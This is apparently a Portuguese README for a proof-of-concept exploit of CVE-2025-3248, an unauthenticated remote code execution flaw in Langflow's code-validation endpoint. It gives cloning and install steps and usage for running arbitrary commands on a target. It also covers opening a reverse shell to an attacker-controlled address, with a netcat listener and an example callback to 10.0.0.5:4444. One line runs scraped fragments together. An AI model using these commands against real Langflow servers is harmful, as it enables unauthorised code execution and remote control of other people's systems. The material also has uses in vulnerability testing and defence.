
PoC para CVE-2025-3248: RCE não autenticado no Langflow < 1.3.0 via /api/v1/validate/code.
Um exploit de prova de conceito que demonstra uma vulnerabilidade de execução remota de código no endpoint de validação de código do Langflow. Esta vulnerabilidade afeta versões do Langflow anteriores à 1.3.0, permitindo que atacantes não autenticados executem código arbitrário através de requisições HTTP elaboradas.
/api/v1/validate/coderequestscoloramagit clone https://github.com/preemware/langflow-exploit
cd langflow-exploit
pip install requests colorama
O exploit suporta dois modos de operação:
Execute um único comando no sistema alvo:
python3 cve-2025-3248.py cmd <target_url> "<command>"
Exemplo:
python3 cve-2025-3248.py cmd http://target:7860 "id"
Inicie um reverse shell interativo:
nc -lvnp 4444
python3 cve-2025-3248.py shell <target_url> <your_ip> <your_port>
Exemplo:
python3 cve-2025-3248.py shell http://target:7860 10.0.0.5 4444